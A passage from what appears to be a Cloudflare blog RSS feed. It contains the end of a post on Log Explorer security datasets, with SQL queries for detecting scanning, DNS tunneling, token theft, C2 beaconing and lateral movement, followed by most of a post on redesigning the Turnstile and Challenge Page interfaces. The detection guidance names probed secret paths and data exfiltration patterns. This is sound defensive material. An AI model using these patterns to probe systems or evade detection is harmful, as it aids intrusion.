Events</b></p></td><td><p>Provides telemetry on the physical state of user devices, useful for correlating hardware or OS-level anomalies with potential security incidents.</p></td></tr><tr><td><p><b>DNS Firewall Logs</b></p></td><td><p>Tracks DNS queries filtered through the DNS Firewall to identify communication with known malicious domains or command-and-control (C2) servers.</p></td></tr><tr><td><p><b>Email Security Alerts</b></p></td><td><p>Logs malicious email activity and phishing attempts detected at the gateway to trace the origin of email-based entry vectors.</p></td></tr><tr><td><p><b>Gateway DNS</b></p></td><td><p>Monitors every DNS query made by users on your network to identify shadow IT, malware callbacks, or domain-generation algorithms (DGAs).</p></td></tr><tr><td><p><b>Gateway HTTP</b></p></td><td><p>Provides full visibility into encrypted and unencrypted web traffic to detect hidden payloads, malicious file downloads, or unauthorized SaaS usage.</p></td></tr><tr><td><p><b>Gateway Network</b></p></td><td><p>Tracks L3/L4 network traffic (non-HTTP) to identify unauthorized port usage, protocol anomalies, or lateral movement within the network.</p></td></tr><tr><td><p><b>IPSec Logs</b></p></td><td><p>Monitors the status and traffic of encrypted site-to-site tunnels to ensure the integrity and availability of secure network connections.</p></td></tr><tr><td><p><b>Magic IDS Detections</b></p></td><td><p>Surfaces matches against intrusion detection signatures to alert investigators to known exploit patterns or malware behavior traversing the network.</p></td></tr><tr><td><p><b>Network Analytics Logs</b></p></td><td><p>Provides high-level visibility into packet-level data to identify volumetric DDoS attacks or unusual traffic spikes targeting specific infrastructure.</p></td></tr><tr><td><p><b>Sinkhole HTTP Logs</b></p></td><td><p>Captures traffic directed to "sinkholed" IP addresses to confirm which internal devices are attempting to communicate with known botnet infrastructure.</p></td></tr><tr><td><p><b>WARP Config Changes</b></p></td><td><p>Tracks modifications to the WARP client settings on end-user devices to ensure that security agents haven't been tampered with or disabled.</p></td></tr><tr><td><p><b>WARP Toggle Changes</b></p></td><td><p>Specifically logs when users enable or disable their secure connectivity, helping to identify periods where a device may have been unprotected.</p></td></tr><tr><td><p><b>Zero Trust Network Session Logs</b></p></td><td><p>Logs the duration and status of authenticated user sessions to map out the complete lifecycle of a user's access within the protected perimeter.</p></td></tr></table>
    <div>
      <h2>Log Explorer can identify malicious activity at every stage</h2>
      <a href="#log-explorer-can-identify-malicious-activity-at-every-stage">
        
      </a>
    </div>
    <p>Get granular application layer visibility with <b>HTTP Requests</b>, <b>Firewall Events</b>, and <b>DNS logs</b> to see exactly how traffic is hitting your public-facing properties.<b> </b>Track internal movement with <b>Access Requests</b>, <b>Gateway logs</b>, and <b>Audit logs</b>. If a credential is compromised, you’ll see where they went. Use <b>Magic IDS</b> and <b>Network Analytics logs</b> to spot volumetric attacks and "East-West" lateral movement within your private network.</p>
    <div>
      <h3>Identify the reconnaissance</h3>
      <a href="#identify-the-reconnaissance">
        
      </a>
    </div>
    <p>Attackers use scanners and other tools to look for entry points, hidden directories, or software vulnerabilities. To identify this, using Log Explorer, you can query <code>http_requests</code> for any <code>EdgeResponseStatus</code> codes of 401, 403, or 404 coming from a single IP, or requests to sensitive paths (e.g. <code>/.env</code>, <code>/.git</code>, <code>/wp-admin</code>). </p><p>Additionally, <code>magic_ids_detections</code> logs can also be used to identify scanning at the network layer. These logs provide packet-level visibility into threats targeting your network. Unlike standard HTTP logs, these logs focus on <b>signature-based detections</b> at the network and transport layers (IP, TCP, UDP). Query to discover cases where a single <code>SourceIP</code> is triggering multiple unique detections across a wide range of <code>DestinationPort</code> values in a short timeframe. Magic IDS signatures can specifically flag activities like Nmap scans or SYN stealth scans.</p>
    <div>
      <h3>Check for diversions</h3>
      <a href="#check-for-diversions">
        
      </a>
    </div>
    <p>While the attacker is conducting reconnaissance, they may attempt to disguise this with a simultaneous network flood. Pivot to <code>network_analytics_logs</code> to see if a volumetric attack is being used as a smokescreen.</p>
    <div>
      <h3>Identify the approach </h3>
      <a href="#identify-the-approach">
        
      </a>
    </div>
    <p>Once attackers identify a potential vulnerability, they begin to craft their weapon. The attacker sends malicious payloads (e.g. SQL injection or large/corrupt file uploads) to confirm the vulnerability. Review <code>http_requests</code> and/or <code>fw_events</code> to identify any Cloudflare detection tools that have triggered. Cloudflare logs security signals in these datasets to easily identify requests with malicious payloads using fields such as <code>WAFAttackScore</code>, <code>WAFSQLiAttackScore</code>, <code>FraudAttack</code>, <code>ContentScanJobResults</code>, and several more. Review <a href="https://developers.cloudflare.com/logs/logpush/logpush-job/datasets/zone/http_requests/"><u>our documentation</u></a> to get a full understanding of these fields. The <code>fw_events</code> logs can be used to determine whether these requests made it past Cloudflare’s defenses by examining the <code>action</code>, <code>source</code>, and <code>ruleID</code> fields. Cloudflare’s managed rules by default blocks many of these payloads by default. Review Application Security Overview to know if your application is protected.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1zpFguYrnbOPwyASGQCqZK/63f398acce2226e453a5eea1cc749241/image3.png" />
          </figure><p><sup><i>Showing the Managed rules Insight that displays on Security Overview if the current zone does not have Managed Rules enabled</i></sup></p>
    <div>
      <h3>Audit the identity</h3>
      <a href="#audit-the-identity">
        
      </a>
    </div>
    <p>Did that suspicious IP manage to log in? Use the <code>ClientIP</code> to search <code>access_requests</code>. If you see a "<code>Decision: Allow</code>" for a sensitive internal app, you know you have a compromised account.</p>
    <div>
      <h3>Stop the leak (data exfiltration)</h3>
      <a href="#stop-the-leak-data-exfiltration">
        
      </a>
    </div>
    <p>Attackers sometimes use DNS tunneling to bypass firewalls by encoding sensitive data (like passwords or SSH keys) into DNS queries. Instead of a normal request like <code>google.com</code>, the logs will show long, encoded strings. Look for an unusually high volume of queries for unique, long, and high-entropy subdomains by examining the fields: <code>QueryName</code>: Look for strings like <a href="http://h3ldo293js92.example.com"><code><u>h3ldo293js92.example.com</u></code></a>, <code>QueryType</code>: Often uses <code>TXT</code>, <code>CNAME</code>, or <code>NULL</code> records to carry the payload, and <code>ClientIP</code>: Identify if a single internal host is generating thousands of these unique requests.</p><p>Additionally, attackers may attempt to leak sensitive data by hiding it within non-standard protocols or by using common protocols (like DNS or ICMP) in unusual ways to bypass standard firewalls. Discover this by querying the <code>magic_ids_detections</code> logs to look for signatures that flag protocol anomalies, such as "ICMP tunneling" or "DNS tunneling" detections in the <code>SignatureMessage</code>.</p><p>Whether you are investigating a zero-day vulnerability or tracking a sophisticated botnet, the data you need is now at your fingertips.</p>
    <div>
      <h2>Correlate across datasets</h2>
      <a href="#correlate-across-datasets">
        
      </a>
    </div>
    <p>Investigate malicious activity across multiple datasets by pivoting between multiple concurrent searches. With Log Explorer, you can now work with multiple queries simultaneously with the new Tabs feature. Switch between tabs to query different datasets or Pivot and adjust queries using filtering via your query results.</p><div>
  
</div>
<p></p><p>When you correlate data across multiple Cloudflare log sources, you can detect sophisticated multi-stage attacks that appear benign when viewed in isolation. This cross-dataset analysis allows you to see the full attack chain from reconnaissance to exfiltration.</p>
    <div>
      <h3>Session hijacking (token theft)</h3>
      <a href="#session-hijacking-token-theft">
        
      </a>
    </div>
    <p><b>Scenario:</b> A user authenticates via Cloudflare Access, but their subsequent HTTP_request traffic looks like a bot.</p><p><b>Step 1:</b> Identify high-risk sessions in <code>http_requests</code>.</p>
            <pre><code>SELECT RayID, ClientIP, ClientRequestUserAgent, BotScore
FROM http_requests
WHERE date = '2026-02-22' 
  AND BotScore &lt; 20 
LIMIT 100</code></pre>
            <p><b>Step 2:</b> Copy the <code>RayID</code> and search <code>access_requests</code> to see which user account is associated with that suspicious bot activity.</p>
            <pre><code>
SELECT Email, IPAddress, Allowed
FROM access_requests
WHERE date = '2026-02-22' 
  AND RayID = 'INSERT_RAY_ID_HERE'</code></pre>
            
    <div>
      <h3>Post-phishing C2 beaconing</h3>
      <a href="#post-phishing-c2-beaconing">
        
      </a>
    </div>
    <p><b>Scenario:</b> An employee clicked a link in a phishing email which resulted in compromising their workstation. This workstation sends a DNS query for a known malicious domain, then immediately triggers an IDS alert.</p><p><b>Step 1:</b> Find phishing attacks by examining email_security_alerts for violations. </p>
            <pre><code>SELECT Timestamp, Threatcategories, To, Alertreason
FROM email_security_alerts
WHERE date = '2026-02-22' 
  AND Threatcategories LIKE 'phishing'</code></pre>
            <p><b>Step 2:</b> Use Access logs to correlate the user’s email (To) to their IP Address.</p>
            <pre><code>SELECT Email, IPAddress
FROM access_requests
WHERE date = '2026-02-22' </code></pre>
            <p><b>Step 3:</b> Find internal IPs querying a specific malicious domain in <code>gateway_dns</code> logs.</p>
            <pre><code>
SELECT SrcIP, QueryName, DstIP, 
FROM gateway_dns
WHERE date = '2026-02-22' 
  AND SrcIP = 'INSERT_IP_FROM_PREVIOUS_QUERY'
  AND QueryName LIKE '%malicious_domain_name%'</code></pre>
            
    <div>
      <h3>Lateral movement (Access → network probing)</h3>
      <a href="#lateral-movement-access-network-probing">
        
      </a>
    </div>
    <p><b>Scenario:</b> A user logs in via Zero Trust and then tries to scan the internal network.</p><p><b>Step 1:</b> Find successful logins from unexpected locations in <code>access_requests</code>.</p>
            <pre><code>SELECT IPAddress, Email, Country
FROM access_requests
WHERE date = '2026-02-22' 
  AND Allowed = true 
  AND Country != 'US' -- Replace with your HQ country</code></pre>
            <p><b>Step 2:</b> Check if that <code>IPAddress</code> is triggering network-level signatures in <code>magic_ids_detections</code>.</p>
            <pre><code>SELECT SignatureMessage, DestinationIP, Protocol
FROM magic_ids_detections
WHERE date = '2026-02-22' 
  AND SourceIP = 'INSERT_IP_ADDRESS_HERE'</code></pre>
            
    <div>
      <h3>Opening doors for more data </h3>
      <a href="#opening-doors-for-more-data">
        
      </a>
    </div>
    <p>From the beginning, Log Explorer was designed with extensibility in mind. Every dataset schema is defined using JSON Schema, a widely-adopted standard for describing the structure and types of JSON data. This design decision has enabled us to easily expand beyond HTTP Requests and Firewall Events to the full breadth of Cloudflare's telemetry. The same schema-driven approach that powered our initial datasets scaled naturally to accommodate Zero Trust logs, network analytics, email security alerts, and everything in between.</p><p>More importantly, this standardization opens the door to ingesting data beyond Cloudflare's native telemetry. Because our ingestion pipeline is schema-driven rather than hard-coded, we're positioned to accept any structured data that can be expressed in JSON format. For security teams managing hybrid environments, this means Log Explorer could eventually serve as a single pane of glass, correlating Cloudflare's edge telemetry with logs from third-party sources, all queryable through the same SQL interface. While today's release focuses on completing coverage of Cloudflare's product portfolio, the architectural groundwork is laid for a future where customers can bring their own data sources with custom schemas.</p>
    <div>
      <h3>Faster data, faster response: architectural upgrades</h3>
      <a href="#faster-data-faster-response-architectural-upgrades">
        
      </a>
    </div>
    <p>To investigate a multi-vector attack effectively, timing is everything. A delay of even a few minutes in the log availability can be the difference between proactive defense and reactive damage control.</p><p>That is why we have optimized our ingestion for better speed and resilience. By increasing concurrency in one part of our ingestion path, we have eliminated bottlenecks that could cause “noisy neighbor” issues, ensuring that one client’s data surge doesn’t slow down another’s visibility. This architectural work has reduced our P99 ingestion latency by approximately 55%, and our P50 by 25%, cutting the time it takes for an event at the edge to become available for your SQL queries.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/41M2eWP0BwrQFSZW4GzZbV/7a6139354abb561aba17e77d83beb17a/image4.png" />
          </figure><p><sup><i>Grafana chart displaying the drop in ingest latency after architectural upgrades</i></sup></p>
    <div>
      <h2>Follow along for more updates</h2>
      <a href="#follow-along-for-more-updates">
        
      </a>
    </div>
    <p>We're just getting started. We're actively working on even more powerful features to further enhance your experience with Log Explorer, including the ability to run these detection queries on a custom defined schedule. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2JIOu9PXDwVAVcmbgq456q/1eace4b5d38bb705e82442a4ee8045dc/Scheduled_Queries_List.png" />
          </figure><p><sup><i>Design mockup of upcoming Log Explorer Scheduled Queries feature</i></sup></p><p><a href="https://blog.cloudflare.com/"><u>Subscribe to the blog</u></a> and keep an eye out for more Log Explorer updates soon in our <a href="https://developers.cloudflare.com/changelog/product/log-explorer/"><u>Change Log</u></a>. </p>
    <div>
      <h2>Get access to Log Explorer</h2>
      <a href="#get-access-to-log-explorer">
        
      </a>
    </div>
    <p>To get access to Log Explorer, you can purchase self-serve directly from the dash or for contract customers, reach out for a <a href="https://www.cloudflare.com/application-services/products/log-explorer/"><u>consultation</u></a> or contact your account manager. Additionally, you can read more in our <a href="https://developers.cloudflare.com/logs/log-explorer/"><u>Developer Documentation</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Logs]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[R2]]></category>
            <category><![CDATA[Storage]]></category>
            <category><![CDATA[SIEM]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <guid isPermaLink="false">1hirraqs3droftHovXp1G6</guid>
            <dc:creator>Jen Sells</dc:creator>
            <dc:creator>Claudio Jolowicz</dc:creator>
            <dc:creator>Nico Gutierrez</dc:creator>
        </item>
        <item>
            <title><![CDATA[The most-seen UI on the Internet? Redesigning Turnstile and Challenge Pages]]></title>
            <link>https://blog.cloudflare.com/the-most-seen-ui-on-the-internet-redesigning-turnstile-and-challenge-pages/</link>
            <pubDate>Fri, 27 Feb 2026 06:00:00 GMT</pubDate>
            <description><![CDATA[ We serve 7.6 billion challenges daily. Here’s how we used research, AAA accessibility standards, and a unified architecture to redesign the Internet’s most-seen user interface. ]]></description>
            <content:encoded><![CDATA[ <p>You've seen it. Maybe you didn't register it consciously, but you've seen it. That little widget asking you to verify you're human. That full-page security check before accessing a website. If you've spent any time on the Internet, you've encountered Cloudflare's Turnstile widget or Challenge Pages — likely more times than you can count.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5YaxxmA9nz7AufmcJmhagL/0db6b65ec7456bc8091affc6beaf3ec2/Image_1_-_Turnstile.png" />
          </figure><p><sup><i>The Turnstile widget – a familiar sight across millions of websites</i></sup></p><p>When we say that a large portion of the Internet sits behind Cloudflare, we mean it. Our Turnstile widget and Challenge Pages are served 7.67 billion times every single day. That's not a typo. Billions. This might just be the most-seen user interface on the Internet.</p><p>And that comes with enormous responsibility.</p><p>Designing a product with billions of eyeballs on it isn't just challenging — it requires a fundamentally different approach. Every pixel, every word, every interaction has to work for someone's grandmother in rural Japan, a teenager in São Paulo, a visually impaired developer in Berlin, and a busy executive in Lagos. All at the same time. In moments of frustration.</p><p>Today we’re sharing the story of how we redesigned Turnstile and Challenge Pages. It's a story told in three parts, by three of us: the design process and research that shaped our decisions (Leo), the engineering challenge of deploying changes at unprecedented scale (Ana), and the measurable impact on billions of users (Marina).</p><p>Let's start with how we approached the problem from a design perspective.</p>
    <div>
      <h2>Part 1: The design process</h2>
      <a href="#part-1-the-design-process">
        
      </a>
    </div>
    
    <div>
      <h3>The problem</h3>
      <a href="#the-problem">
        
      </a>
    </div>
    <p>Let's be honest: nobody likes being asked to prove they're human. You know you're human. I know I'm human. The only one who doesn't seem convinced is that little widget standing between you and the website you're trying to access. At best, it's a minor inconvenience. At worst? You've probably wanted to throw your computer out the window in a fit of rage. We've all been there. And no one would blame you.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/640zjNaqDcNdJy4mYN6H14/ce184df68c9612d77f0767726bf27822/2.png" />
          </figure><p><sup><i>Turnstile integrated into a login flow</i></sup></p><p>As the world warms up to what appears to be an inevitable AI revolution, the need for security verification is only increasing. At Cloudflare, we've seen a significant rise in bot attacks — and in response, organizations are investing more heavily in security measures. That means more challenges being issued to more end users, more often.</p><p>The numbers tell the story:</p><p>2023: 2.14B daily</p><p>2024: 3B daily</p><p>2025: 5.35B daily</p><p>That's a 58.1% average increase in security checks, year over year. More security checks mean more opportunities for end user frustration. The more companies integrate these verification systems to protect themselves and their customers, the higher the chance that someone, somewhere, is going to have a bad experience.</p><p>We knew it was time to take a hard look at our flagship products and ask ourselves: Are we doing right by the billions of people who encounter these experiences? Are we fulfilling our mission to build a better Internet — not just a more secure one, but a more human one?</p><p>The answer, we discovered, was: we could do better.</p>
    <div>
      <h3>The design audit</h3>
      <a href="#the-design-audit">
        
      </a>
    </div>
    <p>Before redesigning anything, we needed to understand what we were working with. We started by conducting a comprehensive audit of every state, every error message, and every interaction across both Turnstile and Challenge Pages.</p><p>What we found wasn't the best.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1g1exDgeRH9QlApBXItcfL/fb0051d1dabaa6c91cf976ef64793502/3.png" />
          </figure><p><sup><i>The state of inconsistency in the Turnstile widget. Multiple states with no unified approach</i></sup></p><p>The inconsistencies were glaring. We had no unified approach across the multitude of different error scenarios. Some messages were overly verbose and technical ("Your device clock is set to a wrong time or this challenge page was accidentally cached by an intermediary and is no longer available"). Others were too vague to be helpful ("Timed out"). The visual language varied wildly — different layouts, different hierarchies, different tones of voice.</p><p>We also examined the feedback we'd received online. Social media, support tickets, community forums — we read it all. The frustration was palpable, and much of it was avoidable.</p><p>Take our feedback mechanism, for example. We offered users feedback options like "The widget sometimes fails" versus "The widget fails all the time." But what's the difference, really? And how were they supposed to know how often it failed? We were asking users to interpret ambiguous options during their most frustrated moments. The more we left open to interpretation, the less useful the feedback became — and the more frustration we saw across social channels.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xKRSM0FfDZikEECwgHoof/ad55208973698cb237444c21d384aff8/4.png" />
          </figure><p><sup><i>The previous feedback screen: "The widget sometimes fails" vs "The widget fails all the time" — what's the difference?</i></sup></p><p>Our Challenge Pages — the full-page security blocks that appear when we detect suspicious activity or when site owners have heightened security settings — had similar issues. Some states were confusing. Others used too much technical jargon. Many failed to provide actionable guidance when users needed it most.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5JUxHjJ4VG13F7QfLONJEQ/fa443e5dd24f10d0c256864cd3f42734/5.png" />
          </figure><p><sup><i>The state of inconsistency on the Challenge pages. Multiple states with no unified approach</i></sup></p><p>The audit was humbling. But it gave us a clear picture of where we needed to focus.</p>
    <div>
      <h2>Mapping the user journey</h2>
      <a href="#mapping-the-user-journey">
        
      </a>
    </div>
    <p>To design better experiences, we first needed to understand every possible path a user could take. What was the happy path? Was there even one? And what were the unhappy paths that led to escalating frustration?</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1oTbFZoRu7guIxzoe64qcm/4f579fe2e70d6225a51504b3de10030f/6.png" />
          </figure><p><sup><i>Mapping the complete user journey — from initial encounter through error scenarios, with sentiment tracking</i></sup></p><p>This was a true cross-functional effort. We worked closely with engineers like Ana who knew the technical ins and outs of every edge case, and with Marina on the product side who understood not just how the product worked, but how users felt about it — the love and the hate we'd see online.</p><p>We have some of the smartest people working on bot protection at Cloudflare. But intelligence and clarity aren't the same thing. There's a delicate balance between technical complexity and user simplicity. Only when these two dance together successfully can we communicate information in a way that actually makes sense to people.</p><p>And here's the thing: the messaging has to work for everyone. A person of any age. Any mental or physical capability. Any cultural background. Any level of technical sophistication. That's what designing at scale really means — you can’t ignore edge cases, since, at such scale, they are no longer edge cases.</p>
    <div>
      <h2>Establishing a unified information architecture</h2>
      <a href="#establishing-a-unified-information-architecture">
        
      </a>
    </div>
    <p>One of the most influential books in UX design is Steve Krug's <a href="https://sensible.com/dont-make-me-think/"><u>Don't Make Me Think</u></a>. The core principle is simple: every moment a user spends trying to interpret, understand, or decode your interface is a moment of friction. And friction, especially in moments of frustration, leads to abandonment.</p><p>Our audit revealed that we were asking users to think far too much. Different pieces of information occupied the same space in the UI across different states. There was no consistent visual hierarchy. Users encountering an error state in Turnstile would find information in a completely different place than they would on a Challenge Page.</p><p>We made a fundamental decision: <b>one information architecture to rule them all</b>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3runU0ihKhNpgdw3LxNZUv/aa4bd76efb5847fde0659bccdae7242d/7.png" />
          </figure><p><sup><i>Visual diagram displaying a unified information architecture with a consistent structure across Turnstile widget and Challenge pages</i></sup></p><p>Both Turnstile and Challenge Pages would now follow the same structural pattern. The same visual hierarchy. The same placement for actions, for explanatory text, for links to documentation.</p><p>Did this constrain our design options? Absolutely. We had to say no to a lot of creative ideas that didn't fit the framework. But constraints aren't the enemy of good design — they're often its best friend. By limiting our options, we could go deeper on the details that actually mattered.</p><p>For users, the benefit is profound: they don't need to re-learn what each piece of the UI means. Error states look consistent. Help links are always in the same place. Once you understand one state, you understand them all. That's cognitive load reduced to a minimum — exactly where it should be during a security verification.</p>
    <div>
      <h2>What user research taught us</h2>
      <a href="#what-user-research-taught-us">
        
      </a>
    </div>
    <p>How do you keep yourself accountable when redesigning something that billions of people see? You test. A lot.</p><p>We recruited 8 participants across 8 different countries, deliberately seeking diversity in age, digital savviness, and cultural background. We weren't looking for tech-savvy early adopters — we wanted to understand how the redesign would work for everyone.</p><p>Our approach was rigorous: participants saw both the current experience and proposed changes, without knowing which was "old" or "new." We counterbalanced positioning to eliminate bias. And we did not just test our new ideas, but also challenged our assumptions about what needed changing in the first place.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/59mmLHihbM9TewXmlYQwbO/e5db88efca948de1b31e9dc499195eb8/8.png" />
          </figure><p><sup><i>Two different versions of a Turnstile being tested in an A/B test</i></sup></p>
    <div>
      <h3>Some things didn’t need fixing</h3>
      <a href="#some-things-didnt-need-fixing">
        
      </a>
    </div>
    <p>One hypothesis: should we align with competitors? Most CAPTCHA providers show "I am human" across all states. We use distinct content — "Verify you are human," then "Verifying...," then "Success!"</p><p>Were we overcomplicating things? We tested it head-to-head.</p><p>Our approach won decisively. For the interactivity state, "Verify you are human" scored 5 out of 8 points versus just 3 for "I am human." For the verifying state, it was even more dramatic — 7.5 versus 0.5. Users wanted to know what was happening, not just be told what they were.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ke1kO0i7EZxZm6voQBpyn/f489bef9b66d1221aa89adb5746559b7/9.png" />
          </figure><p><sup><i>User testing results: users strongly favored our approach over the competitor-style design</i></sup></p><p>This experiment didn't ship as a feature, but it was invaluable. It gave us confidence we weren't just being different for the sake of it. Some things were already right.</p>
    <div>
      <h3>But these needed to change</h3>
      <a href="#but-these-needed-to-change">
        
      </a>
    </div>
    <p>The research surfaced four areas where we were failing users:</p><p><b>Help, not bureaucracy</b>. When users encountered errors, we offered "Send Feedback." In testing, they were baffled. "Who am I sending this to? The website? Cloudflare? My ISP?" More importantly, we discovered something fundamental: at the moment of maximum frustration, people don't want to file a report — they want to fix the problem. We replaced "Send Feedback" with "Troubleshoot" — a single word that promises action rather than bureaucracy.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2jN2reUR55qCbssCDFTZfB/fb5396ec853ee549ebfec5d0d94b901f/10.png" />
          </figure><p><sup><i>The problematic "Send Feedback" prompt: users didn't know who they were sending feedback to</i></sup></p><p><b>Attention, not alarm</b>. We'd used red backgrounds liberally for errors. The reaction in testing was visceral — participants felt they had failed, felt powerless. Even for simple issues that would resolve with a retry, users assumed the worst and gave up. Red at full saturation wasn't communicating "Here's something to address." It was communicating "You have failed, and there's nothing you can do." The fix: red only for icons, never for text or backgrounds.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5seE6Xcrj9lvSpBYDEkk6N/7f0c1c17fd86b05397d35b685b0addfb/11.png" />
          </figure><p><sup><i>The evolution: from the states with unclear error state description in red to much clearer and concise error communication in neutral-color text.</i></sup></p><p><b>Scannable, not verbose</b>. We'd tried to be thorough, explaining errors in technical detail. It backfired. Non-technical users found it alienating. Technical users didn't need it. Everyone was trying to read it in the tiny real estate of a widget. The lesson: less is more, especially in constrained spaces during stressful moments.</p><p><b>Accessible to everyone</b>. Our audit revealed 10px fonts in some states. Grey text that technically met AA (at least 4.5:1 for normal text and 3:1 for large text) compliance but was difficult to read in practice. "Technically compliant" isn't good enough when you're serving the entire Internet.</p><p>We set a clear goal: to meet the <a href="https://www.w3.org/TR/WCAG22/"><u>WCAG 2.2 AAA</u></a> standard— the highest and most stringent level of web accessibility compliance, designed to make content accessible to the broadest range of users, including those with severe disabilities. Throughout the redesign, when visual consistency conflicted with readability, readability won. Every time.</p><p>This extended beyond vision. We designed for screen reader users, keyboard-only navigators, and people with color vision variations — going beyond what automated compliance tools can catch.</p><p>And accessibility isn't just about impairments — it's about language. What fits in English, overflows in German. What's concise in Spanish is ambiguous in Japanese. Supporting over 40 languages forced us to radically simplify. The same "Unable to connect to website / Troubleshoot" pattern now works across English, Bulgarian, Danish, German, Greek, Japanese, Indonesian, Russian, Slovak, Slovenian, Serbian, Filipino, and many more.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6e4pvgMUS4BUXsPqi1qV6l/b6ffdc0d5f1e8e90394169db7162d10c/12.png" />
          </figure><p><sup><i>The redesigned error state across 12 languages — consistent layout despite varying text lengths </i></sup></p>
    <div>
      <h2>Final redesign</h2>
      <a href="#final-redesign">
        
      </a>
    </div>
    <p>So what did we actually ship?</p><p>First, let's talk about what we didn't change. The happy path — "Verify you are human" → "Verifying..." → "Success!" — tested exceptionally well. Users understood what was happening at each stage. The distinct content for each state, which we'd worried might be overcomplicating things, was actually our competitive advantage.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2R4QJ04uz9r1TVZjuqsHG9/61c1023eaa105b4841456258f3370220/13.png" />
          </figure><p><i><sup> The happy path: Verify you are human → Verifying → Success! These states tested well and remained largely unchanged</sup></i></p><p>But for the states that needed work, we made significant changes guided by everything we learned.</p>
    <div>
      <h3>Simplified, scannable content</h3>
      <a href="#simplified-scannable-content">
        
      </a>
    </div>
    <p>We radically reduced the amount of text in error states. Instead of verbose explanations like "Your device clock is set to a wrong time or this challenge page was accidentally cached by an intermediary and is no longer available," we now show:</p><ol><li><p>A clear, simple state name (e.g., "Incorrect device time")</p></li><li><p>A prominent "Troubleshoot" link</p></li></ol><p>That's it. The detailed guidance now lives in a dedicated modal screen that opens when users need it — giving them room to actually read and follow troubleshooting steps.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4ZYjlJgw6DOiTuJBFXpewn/5d714c3a19723dfe9fa9802d0d5926b8/14.png" />
          </figure><p><sup><i>The troubleshooting modal: detailed guidance when users need it, without cluttering the widget</i></sup></p><p>The troubleshooting modal provides context ("This error occurs when your device's clock or calendar is inaccurate. To complete this website’s security verification process, your device must be set to the correct date and time in your time zone."), numbered steps to try, links to documentation, and — only after the user has tried to resolve the issue — an option to submit feedback to Cloudflare. Help first, feedback second.</p>
    <div>
      <h3>AAA accessibility compliance</h3>
      <a href="#aaa-accessibility-compliance">
        
      </a>
    </div>
    <p>Every state now meets WCAG 2.2 AAA standards for contrast and readability. Font sizes have established minimums. Interactive elements are clearly focusable and properly announced by screen readers.</p>
    <div>
      <h3>Unified experience across Turnstile and Challenge pages</h3>
      <a href="#unified-experience-across-turnstile-and-challenge-pages">
        
      </a>
    </div>
    <p>Whether users encounter the compact Turnstile widget or a full Challenge Page, the information architecture is now consistent. Same hierarchy. Same placement. Same mental model.</p><p>Challenge Pages now follow a clean structure: the website name and favicon at the top, a clear status message (like "Verification successful" or "Your browser is out of date"), and actionable guidance below. No more walls of orange or red text. No more technical jargon without context.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4PuWePTOaLihpfqm2iimJW/e34c4a009c36524a6d72c15ae0f78d00/15.png" />
          </figure><p><sup><i>Re-designed Challenge page states with clear troubleshooting instructions.</i></sup></p>
    <div>
      <h3>Validated across languages</h3>
      <a href="#validated-across-languages">
        
      </a>
    </div>
    <p>Every piece of content was tested in over 40 supported languages. Our process involved three layers of validation:</p><ol><li><p>Initial design review by the design team</p></li><li><p>Professional translation by our qualified vendor</p></li><li><p>Final review by native-speaking Cloudflare employees</p></li></ol><p>This wasn't just about translation accuracy — it was about ensuring the visual design held up when content length varied dramatically between languages.</p>
    <div>
      <h3>The complete picture</h3>
      <a href="#the-complete-picture">
        
      </a>
    </div>
    <p>The result is a security verification experience that's clearer, more accessible, less frustrating, and — crucially — just as secure. We didn't compromise on protection to improve the experience. We proved that good design and strong security aren't in conflict.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5t6FRRzLamGaTbEiZqVpnf/92b688679d1c8265ba3c6fd4159061bf/16.png" />
          </figure><p><sup><i>Re-designed Turnstile widgets on the left and a re-designed Challenge page on the right</i></sup></p><p>But designing the experience was only half the battle. Shipping it to billions of users? That's where Ana comes in.</p>
    <div>
      <h2>Part 2: Shipping to billions</h2>
      <a href="#part-2-shipping-to-billions">
        
      </a>
    </div>
    
    <div>
      <h4><b>Beyond centering a div</b></h4>
      <a href="#beyond-centering-a-div">
        
      </a>
    </div>
    <p>Some may say the hardest part of being a Frontend Engineer is centering a div. In reality, the real challenge often lies much deeper, especially when working close to the platform primitives. Building a critical piece of Internet infrastructure using native APIs forces you to think differently about UI development, tradeoffs, and long-term maintainability.</p><p>In our case, we use Rust to handle the UI for both the Turnstile widget and the Challenge page. This decision brought clear benefits in terms of safety and consistency across platforms, but it also increased frontend complexity. Many of us are used to the ergonomics of modern frameworks like React, where common UI interactions come almost for free. Working with Rust meant reimplementing even simple interactions using lower level constructs like <i>document.getElementById</i>, <i>createElement</i>, and <i>appendChild</i>.</p><p>On top of that, compile times and strict checks naturally slowed down rapid UI iteration compared to JavaScript based frameworks. Debugging was also more involved, as the tooling ecosystem is still evolving. These constraints pushed us to be more deliberate, more thoughtful, and ultimately more disciplined in how we approached UI development.</p>
    <div>
      <h4><b>Small visual changes, big global impact</b></h4>
      <a href="#small-visual-changes-big-global-impact">
        
